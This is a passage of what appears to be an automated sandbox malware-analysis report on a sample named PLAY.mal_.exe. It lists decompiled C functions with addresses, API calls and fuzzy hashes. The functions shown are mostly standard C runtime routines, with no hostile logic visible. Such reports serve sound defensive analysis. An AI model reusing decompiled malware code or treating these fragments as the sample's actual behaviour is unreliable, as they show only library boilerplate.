										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t286 = _v88 - _v112 + _t275;
											_v92 = _t286;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t275 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t286 = _t286 + 1;
															_v92 = _t286;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t264 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t275;
							_t188 = E00AFC1DF(_t264);
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
								_push(1);
								_push(_t275);
								goto L30;
							} else {
								_t202 = _t275 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t271 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0xb0d280 + _t271 * 4)) + 0x2e)) = _v33;
									 *(_t255 +  *((intOrPtr*)(0xb0d280 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0xb0d280 + _t271 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t286 + 1;
									goto L45;
								} else {
									_t206 = E00AFF23D( &_v76, _t275, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t275 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
							_v23 =  *_t275;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E00AFF23D();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00AF7B30(_v8 ^ _t294);
			}


























































































          0x00affa10
          0x00affa17
          0x00affa1a
          0x00affa1f
          0x00affa27
          0x00affa2a
          0x00affa2e
          0x00affa31
          0x00affa34
          0x00affa3b
          0x00affa3e
          0x00affa45
          0x00affa47
          0x00affa4a
          0x00affa4d
          0x00affa53
          0x00affa55
          0x00affa5c
          0x00affa69
          0x00affa6a
          0x00affa6d
          0x00affa70
          0x00affa71
          0x00affa72
          0x00affa75
          0x00affa7a
          0x00affd86
          0x00affd86
          0x00affa80
          0x00affa80
          0x00affa83
          0x00affa85
          0x00affa8b
          0x00affa8e
          0x00affa95
          0x00affa9c
          0x00affaa5
          0x00000000
          0x00000000
          0x00affaab
          0x00affab1
          0x00affab3
          0x00affab5
          0x00affab8
          0x00affabd
          0x00affac1
          0x00000000
          0x00000000
          0x00000000
          0x00affac1
          0x00affac6
          0x00affac9
          0x00affacb
          0x00affad0
          0x00affb82
          0x00affb83
          0x00affb86
          0x00affb88
          0x00affd36
          0x00affd38
          0x00000000
          0x00affd3a
          0x00affd3a
          0x00affd3d
          0x00affd40
          0x00affd49
          0x00affd4c
          0x00affd4d
          0x00affd51
          0x00affd54
          0x00affd54
          0x00000000
          0x00affd58
          0x00affb8e
          0x00affb8e
          0x00affb93
          0x00affb96
          0x00affb9c
          0x00affba2
          0x00affbab
          0x00affbae
          0x00affbae
          0x00affbaf
          0x00affbb0
          0x00affbb3
          0x00affbb4
          0x00000000
          0x00affbb4
          0x00affad6
          0x00affae5
          0x00affae6
          0x00affae9
          0x00affaeb
          0x00affaf0
          0x00affd01
          0x00affd03
          0x00affd05
          0x00affd08
          0x00affd0d
          0x00affd16
          0x00affd19
          0x00affd1a
          0x00affd1e
          0x00affd21
          0x00affd24
          0x00affd24
          0x00affd28
          0x00affd28
          0x00affd28
          0x00affd2b
          0x00affd2b
          0x00affd2b
          0x00affd2d
          0x00affd2d
          0x00affd31
          0x00affaf6
          0x00affaf6
          0x00affafa
          0x00affafc
          0x00affaff
          0x00affb02
          0x00affb06
          0x00affb07
          0x00affb0b
          0x00affb0b
          0x00affb0e
          0x00affb13
          0x00affb1f
          0x00affb24
          0x00affb27
          0x00affb27
          0x00affb2c
          0x00affb2e
          0x00affb31
          0x00affb33
          0x00affb36
          0x00affb39
          0x00affb3c
          0x00affb44
          0x00affb48
          0x00affb4c
          0x00affb4c
          0x00affb52
          0x00affb58
          0x00affb5b
          0x00affb63
          0x00affb6a
          0x00affb6e
          0x00affb6f
          0x00affb72
          0x00affb73
          0x00affbb7
          0x00affbb7
          0x00affbbb
          0x00affbbc
          0x00affbc1
          0x00affbc7
          0x00000000
          0x00affbcd
          0x00affbd1
          0x00affc5a
          0x00affc61
          0x00affc69
          0x00affc71
          0x00affc76
          0x00affc79
          0x00affc7e
          0x00000000
          0x00affc84
          0x00affc99
          0x00affd7d
          0x00affd83
          0x00000000
          0x00affc9f
          0x00affca8
          0x00affcaa
          0x00affcb0
          0x00000000
          0x00affcb6
          0x00affcba
          0x00affcf0
          0x00affcf3
          0x00000000
          0x00affcf9
          0x00affcf9
          0x00000000
          0x00affcf9
          0x00affcbc
          0x00affcbe
          0x00affcc0
          0x00affcd9
          0x00000000
          0x00affcdf
          0x00affce3
          0x00000000
          0x00affce9
          0x00affce9
          0x00affcec
          0x00affced
          0x00000000
          0x00affced
          0x00affce3
          0x00affcd9
          0x00affcba
          0x00affcb0
          0x00affc99
          0x00affc7e
          0x00affbc7
          0x00affaf0
          0x00000000
          0x00affbd8
          0x00affbd8
          0x00affbdb
          0x00affbdf
          0x00affbe2
          0x00affc04
          0x00affc07
          0x00affc0c
          0x00affc10
          0x00affc14
          0x00affc42
          0x00affc44
          0x00000000
          0x00affc16
          0x00affc16
          0x00affc19
          0x00affc1c
          0x00affc1f
          0x00affd5a
          0x00affd5d
          0x00affd6a
          0x00affd75
          0x00affd7a
          0x00000000
          0x00affc25
          0x00affc2c
          0x00affc31
          0x00affc34
          0x00affc37
          0x00000000
          0x00affc3d
          0x00affc3d
          0x00000000
          0x00affc3d
          0x00affc37
          0x00affc1f
          0x00affbe4
          0x00affbeb
          0x00affbf0
          0x00affbf6
          0x00affbf8
          0x00affbff
          0x00affc45
          0x00affc48
          0x00affc49
          0x00affc4e
          0x00affc51
          0x00affc54
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00affc54
          0x00000000
          0x00affbe2
          0x00affa83
          0x00affd89
          0x00affd89
          0x00affd8b
          0x00affd8e
          0x00affd8e
          0x00affd8e
          0x00affd8e
          0x00affda0
          0x00affda2
          0x00affda3
          0x00affda4
          0x00affdae

          APIs
          • GetConsoleCP.KERNEL32(00000016,00AFA504,00000000), ref: 00AFFA4D
          • __fassign.LIBCMT ref: 00AFFC2C
          • __fassign.LIBCMT ref: 00AFFC49
          • WriteFile.KERNEL32(?,00B0A768,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AFFC91
          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00AFFCD1
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AFFD7D
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FileWrite__fassign$ConsoleErrorLast
          • String ID:
          • API String ID: 4031098158-0
          • Opcode ID: 3ce60fe8078490efb72f3d95c10f4d2d1bd4ace849df767503bbdd87d6f38b0c
          • Instruction ID: 21bb716177b01c01c54da59672a578f2b1f1fa2d0d5071e6646bd6984dd0c25b
          • Opcode Fuzzy Hash: 3ce60fe8078490efb72f3d95c10f4d2d1bd4ace849df767503bbdd87d6f38b0c
          • Instruction Fuzzy Hash: 5CD17871D0125C9FCB15CFE8C9809EDBBB5BF49314F28416AEA55BB242E630AE46CB50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFB0EE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 25%
          			E00AFB0EE(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0xb04104(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}






          0x00afb0f4
          0x00afb0f8
          0x00afb103
          0x00afb10b
          0x00afb116
          0x00afb11c
          0x00afb120
          0x00afb127
          0x00afb12d
          0x00afb12d
          0x00afb12f
          0x00afb134
          0x00000000
          0x00afb139
          0x00afb140

          APIs
          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00AFB0E3,00AFBFEF,?,00AFB0AB,00AFA504,00000087,00AFBFEF), ref: 00AFB103
          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AFB116
          • FreeLibrary.KERNEL32(00000000,?,?,00AFB0E3,00AFBFEF,?,00AFB0AB,00AFA504,00000087,00AFBFEF), ref: 00AFB139
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: AddressFreeHandleLibraryModuleProc
          • String ID: CorExitProcess$mscoree.dll
          • API String ID: 4061214504-1276376045
          • Opcode ID: e054871a1db46c02a0e4778ee7c6ad153db8a8aa19d01a4a7fe9d1b1cefb0f99
          • Instruction ID: 1757e77893ce9693e6f1ea8ad288cf58cf6ba8a6d3a4044db5907586066c2844
          • Opcode Fuzzy Hash: e054871a1db46c02a0e4778ee7c6ad153db8a8aa19d01a4a7fe9d1b1cefb0f99
          • Instruction Fuzzy Hash: A8F01C7151121CFBDB119B90DE1ABADBFB8EB60756F140164B705B21A0DB748E40DAA4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFB3F1 Relevance: 7.6, APIs: 5, Instructions: 119COMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 92%
          			E00AFB3F1(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;
				signed int _t38;
				signed int _t41;
				void* _t46;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				signed int* _t70;
				signed int _t74;
				void* _t75;

				_t63 = __edx;
				_v12 = __ecx;
				_t27 =  *__ecx;
				_t70 =  *_t27;
				if(_t70 == 0) {
					L14:
					return _t27 | 0xffffffff;
				}
				_t29 =  *0xb0b004; // 0x700d25f7
				_t50 =  *_t70 ^ _t29;
				_t67 = _t70[1] ^ _t29;
				_t72 = _t70[2] ^ _t29;
				asm("ror edi, cl");
				asm("ror esi, cl");
				asm("ror ebx, cl");
				if(_t67 != _t72) {
					L13:
					 *_t67 = E00AFA881( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
					_t33 = E00AF7EAD(_t50);
					_t51 = _v12;
					 *((intOrPtr*)( *((intOrPtr*)( *_t51)))) = _t33;
					_t23 = _t67 + 4; // 0x4
					 *((intOrPtr*)( *((intOrPtr*)( *_t51)) + 4)) = E00AF7EAD(_t23);
					 *((intOrPtr*)( *((intOrPtr*)( *_t51)) + 8)) = E00AF7EAD(_t72);
					return 0;
				}
				_t38 = 0x200;
				_t74 = _t72 - _t50 >> 2;
				if(_t74 <= 0x200) {
					_t38 = _t74;
				}
				_t68 = _t38 + _t74;
				if(_t68 == 0) {
					_t68 = 0x20;
				}
				if(_t68 < _t74) {
					L8:
					_t68 = _t74 + 4;
					_v8 = E00AFE416(_t50, _t68, 4);
					_t27 = E00AFC2CE(0);
					_t61 = _v8;
					_t75 = _t75 + 0x10;
					if(_t61 == 0) {
						goto L14;
					}
					goto L9;
				} else {
					_v8 = E00AFE416(_t50, _t68, 4);
					E00AFC2CE(0);
					_t61 = _v8;
					_t75 = _t75 + 0x10;
					if(_t61 != 0) {
						L9:
						_t50 = _t61;
						_v8 = _t61 + _t74 * 4;
						_t72 = _t61 + _t68 * 4;
						_t41 =  *0xb0b004; // 0x700d25f7
						_t67 = _v8;
						_t62 = _t67;
						_v16 = _t41;
						asm("sbb edx, edx");
						_t65 =  !_t63 & _t61 + _t68 * 0x00000004 - _t67 + 0x00000003 >> 0x00000002;
						if(_t65 == 0) {
							goto L13;
						}
						_t69 = _v16;
						_t46 = 0;
						do {
							_t46 = _t46 + 1;
							 *_t62 = _t69;
							_t62 = _t62 + 4;
						} while (_t46 != _t65);
						_t67 = _v8;
						goto L13;
					}
					goto L8;
				}
			}
























          0x00afb3f1
          0x00afb3fb
          0x00afb400
          0x00afb403
          0x00afb407
          0x00afb512
          0x00000000
          0x00afb512
          0x00afb40d
          0x00afb41c
          0x00afb421
          0x00afb423
          0x00afb425
          0x00afb427
          0x00afb429
          0x00afb42d
          0x00afb4d0
          0x00afb4de
          0x00afb4e0
          0x00afb4e5
          0x00afb4ec
          0x00afb4ee
          0x00afb4fc
          0x00afb50b
          0x00000000
          0x00afb50e
          0x00afb435
          0x00afb43a
          0x00afb43f
          0x00afb441
          0x00afb441
          0x00afb443
          0x00afb448
          0x00afb44c
          0x00afb44c
          0x00afb44f
          0x00afb46e
          0x00afb470
          0x00afb47c
          0x00afb47f
          0x00afb484
          0x00afb487
          0x00afb48c
          0x00000000
          0x00000000
          0x00000000
          0x00afb451
          0x00afb45c
          0x00afb45f
          0x00afb464
          0x00afb467
          0x00afb46c
          0x00afb492
          0x00afb495
          0x00afb497
          0x00afb49a
          0x00afb49d
          0x00afb4a2
          0x00afb4a5
          0x00afb4a7
          0x00afb4b6
          0x00afb4ba
          0x00afb4bc
          0x00000000
          0x00000000
          0x00afb4be
          0x00afb4c1
          0x00afb4c3
          0x00afb4c3
          0x00afb4c4
          0x00afb4c6
          0x00afb4c9
          0x00afb4cd
          0x00000000
          0x00afb4cd
          0x00000000
          0x00afb46c

          APIs
          • _free.LIBCMT ref: 00AFB45F
          • _free.LIBCMT ref: 00AFB47F
          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AFB4E0
          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AFB4F2
          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AFB4FF
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: __crt_fast_encode_pointer$_free
          • String ID:
          • API String ID: 366466260-0
          • Opcode ID: 101ac935c8a96af8d0d9f7b98d31d7b2996bc2ad0d4267a7163f3ee6251d4b70
          • Instruction ID: b2e39c73533e4712251c92313655f86c0127314d6069071d79a6a51086af7c29
          • Opcode Fuzzy Hash: 101ac935c8a96af8d0d9f7b98d31d7b2996bc2ad0d4267a7163f3ee6251d4b70
          • Instruction Fuzzy Hash: A141B572A102089FDB20DFA8C981A6DB7F6EF88714F1544A8F616EB351DB31ED01CB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFD9AF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 100%
          			E00AFD9AF(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xb0b640; // 0xb0b690
					if(_t23 != 0) {
						E00AFC2CE(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xb0b644; // 0xb0d560
					if(_t24 != 0) {
						E00AFC2CE(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xb0b648; // 0xb0d560
					if(_t25 != 0) {
						E00AFC2CE(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xb0b670; // 0xb0b694
					if(_t26 != 0) {
						E00AFC2CE(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xb0b674; // 0xb0d564
					if(_t27 != 0) {
						return E00AFC2CE(_t6);
					}
				}
				return _t6;
			}










          0x00afd9b5
          0x00afd9ba
          0x00afd9be
          0x00afd9c4
          0x00afd9c7
          0x00afd9cc
          0x00afd9d0
          0x00afd9d6
          0x00afd9d9
          0x00afd9de
          0x00afd9e2
          0x00afd9e8
          0x00afd9eb
          0x00afd9f0
          0x00afd9f4
          0x00afd9fa
          0x00afd9fd
          0x00afda02
          0x00afda03
          0x00afda06
          0x00afda0c
          0x00000000
          0x00afda14
          0x00afda0c
          0x00afda17

          APIs
          • _free.LIBCMT ref: 00AFD9C7
            • Part of subcall function 00AFC2CE: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFB5D2), ref: 00AFC2E4
            • Part of subcall function 00AFC2CE: GetLastError.KERNEL32(?,?,00AFB5D2), ref: 00AFC2F6
          • _free.LIBCMT ref: 00AFD9D9
          • _free.LIBCMT ref: 00AFD9EB
          • _free.LIBCMT ref: 00AFD9FD
          • _free.LIBCMT ref: 00AFDA0F
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: 82854a70b66c4fc1248910f52716559c85231e0218233c8f353cc4cbc4792df9
          • Instruction ID: 72fe6bc90841c9f7e9d3414f979e21454ddbd21351da320042237d0186eba000
          • Opcode Fuzzy Hash: 82854a70b66c4fc1248910f52716559c85231e0218233c8f353cc4cbc4792df9
          • Instruction Fuzzy Hash: 34F0AF3350461CABC625FFE9EBC6C76B7EAEA107707644809F688E7551CF21FC809A64
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFA90E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON
          Download Yara Rule
          C-Code - Quality: 90%
          			E00AFA90E(void* __edx, intOrPtr _a4) {
				signed int _v8;
				struct HINSTANCE__* _v12;
				char _v16;
				WCHAR* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t25;
				WCHAR** _t35;
				WCHAR** _t36;
				WCHAR* _t39;
				WCHAR* _t41;
				WCHAR* _t42;
				intOrPtr* _t43;
				WCHAR** _t44;
				intOrPtr _t47;
				WCHAR* _t48;
				WCHAR* _t53;
				WCHAR** _t57;
				WCHAR* _t63;
				WCHAR* _t65;

				_t47 = _a4;
				if(_t47 != 0) {
					__eflags = _t47 - 2;
					if(_t47 == 2) {
						L5:
						GetModuleFileNameW(0, 0xb0cea8, 0x104);
						_t25 =  *0xb0d124; // 0x1341c1e
						 *0xb0d110 = 0xb0cea8;
						_v20 = _t25;
						__eflags = _t25;
						if(_t25 == 0) {
							L7:
							_t25 = 0xb0cea8;
							_v20 = 0xb0cea8;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t63 = E00AFABD2(E00AFAA3D(_t25, 0, 0,  &_v8,  &_v16), _v8, _v16, 2);
							__eflags = _t63;
							if(__eflags != 0) {
								E00AFAA3D(_v20, _t63, _t63 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t47 - 1;
								if(_t47 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t48 = E00AFC99A(_t47, 0, _t63, _t63);
									__eflags = _t48;
									if(_t48 == 0) {
										_t57 = _v12;
										_t53 = 0;
										_t35 = _t57;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											L17:
											_t36 = 0;
											 *0xb0d114 = _t53;
											_v12 = 0;
											_t48 = 0;
											 *0xb0d11c = _t57;
											L18:
											E00AFC2CE(_t36);
											_v12 = 0;
											L19:
											E00AFC2CE(_t63);
											_t39 = _t48;
											L20:
											return _t39;
										} else {
											goto L16;
										}
										do {
											L16:
											_t35 =  &(_t35[1]);
											_t53 =  &(_t53[0]);
											__eflags =  *_t35;
										} while ( *_t35 != 0);
										goto L17;
									}
									_t36 = _v12;
									goto L18;
								}
								_t41 = _v8 - 1;
								__eflags = _t41;
								 *0xb0d114 = _t41;
								_t42 = _t63;
								_t63 = 0;
								 *0xb0d11c = _t42;
								L12:
								_t48 = 0;
								goto L19;
							}
							_t43 = E00AFA4EC(__eflags);
							_push(0xc);
							_pop(0);
							 *_t43 = 0;
							goto L12;
						}
						__eflags =  *_t25;
						if( *_t25 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t47 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t44 = E00AFA4EC(__eflags);
					_t65 = 0x16;
					 *_t44 = _t65;
					E00AFA42F();
					_t39 = _t65;
					goto L20;
				}
				return 0;
			}
























          0x00afa917
          0x00afa91c
          0x00afa926
          0x00afa929
          0x00afa946
          0x00afa955
          0x00afa95b
          0x00afa960
          0x00afa966
          0x00afa969
          0x00afa96b
          0x00afa972
          0x00afa972
          0x00afa974
          0x00afa977
          0x00afa97a
          0x00afa981
          0x00afa99a
          0x00afa99f
          0x00afa9a1
          0x00afa9c2
          0x00afa9ca
          0x00afa9cd
          0x00afa9e8
          0x00afa9eb
          0x00afa9f2
          0x00afa9f6
          0x00afa9f8
          0x00afa9ff
          0x00afaa02
          0x00afaa04
          0x00afaa06
          0x00afaa08
          0x00afaa12
          0x00afaa12
          0x00afaa14
          0x00afaa1a
          0x00afaa1d
          0x00afaa1f
          0x00afaa25
          0x00afaa26
          0x00afaa2c
          0x00afaa2f
          0x00afaa30
          0x00afaa36
          0x00afaa39
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00afaa0a
          0x00afaa0a
          0x00afaa0a
          0x00afaa0d
          0x00afaa0e
          0x00afaa0e
          0x00000000
          0x00afaa0a
          0x00afa9fa
          0x00000000
          0x00afa9fa
          0x00afa9d2
          0x00afa9d2
          0x00afa9d3
          0x00afa9d8
          0x00afa9da
          0x00afa9dc
          0x00afa9e1
          0x00afa9e1
          0x00000000
          0x00afa9e1
          0x00afa9a3
          0x00afa9a8
          0x00afa9aa
          0x00afa9ab
          0x00000000
          0x00afa9ab
          0x00afa96d
          0x00afa970
          0x00000000
          0x00000000
          0x00000000
          0x00afa970
          0x00afa92b
          0x00afa92e
          0x00000000
          0x00000000
          0x00afa930
          0x00afa937
          0x00afa938
          0x00afa93a
          0x00afa93f
          0x00000000
          0x00afa93f
          0x00000000

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: C:\Users\user\Desktop\PLAY.mal_.exe
          • API String ID: 0-1168550717
          • Opcode ID: f277d2a956d17abdfcb2eee5bc77412dd62ca523cff817ea9fbff9468939d084
          • Instruction ID: 97fd03de4fdc989fb662e343019e671a319f8347056c95ea12ad7112c81077c6
          • Opcode Fuzzy Hash: f277d2a956d17abdfcb2eee5bc77412dd62ca523cff817ea9fbff9468939d084
          • Instruction Fuzzy Hash: 90318AB1A0021CAFC721EFD9DD859FEBBF8EBA5350B114066F609E7251DAB04E44CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFC08A Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 85%
          			E00AFC08A(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				void* _t14;
				signed int _t18;
				long _t21;

				_t14 = __ecx;
				_t21 = GetLastError();
				_t2 =  *0xb0b050; // 0x2
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00AFE29A(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E00AFC42C(_t14, 1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E00AFE29A(__eflags,  *0xb0b050, _t18);
							if(__eflags != 0) {
								E00AFBD61(_t18, 0xb0d0f8);
								E00AFC2CE(0);
								goto L13;
							} else {
								_t13 = 0;
								E00AFE29A(__eflags,  *0xb0b050, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00AFE29A(0,  *0xb0b050, 0);
							_push(0);
							L9:
							E00AFC2CE();
							goto L4;
						}
					}
				} else {
					_t18 = E00AFE25B(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0xb0b050; // 0x2
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}









          0x00afc08a
          0x00afc095
          0x00afc097
          0x00afc09c
          0x00afc09f
          0x00afc0bd
          0x00afc0c0
          0x00afc0c5
          0x00afc0c7
          0x00000000
          0x00afc0c9
          0x00afc0d5
          0x00afc0d9
          0x00afc0db
          0x00afc100
          0x00afc102
          0x00afc11b
          0x00afc122
          0x00000000
          0x00afc104
          0x00afc104
          0x00afc10d
          0x00afc112
          0x00000000
          0x00afc112
          0x00afc0dd
          0x00afc0dd
          0x00afc0dd
          0x00afc0e6
          0x00afc0eb
          0x00afc0ec
          0x00afc0ec
          0x00000000
          0x00afc0f1
          0x00afc0db
          0x00afc0a1
          0x00afc0a7
          0x00afc0ab
          0x00afc0b8
          0x00000000
          0x00afc0ad
          0x00afc0b0
          0x00afc12a
          0x00afc12a
          0x00afc0b2
          0x00afc0b2
          0x00afc0b2
          0x00afc0b4
          0x00afc0b4
          0x00afc0b4
          0x00afc0b0
          0x00afc0ab
          0x00afc12d
          0x00afc135
          0x00afc13e

          APIs
          • GetLastError.KERNEL32(?,?,00000087,00AFA4F1,00AFC2F4,?,?,00AFB5D2), ref: 00AFC08F
          • _free.LIBCMT ref: 00AFC0EC
          • _free.LIBCMT ref: 00AFC122
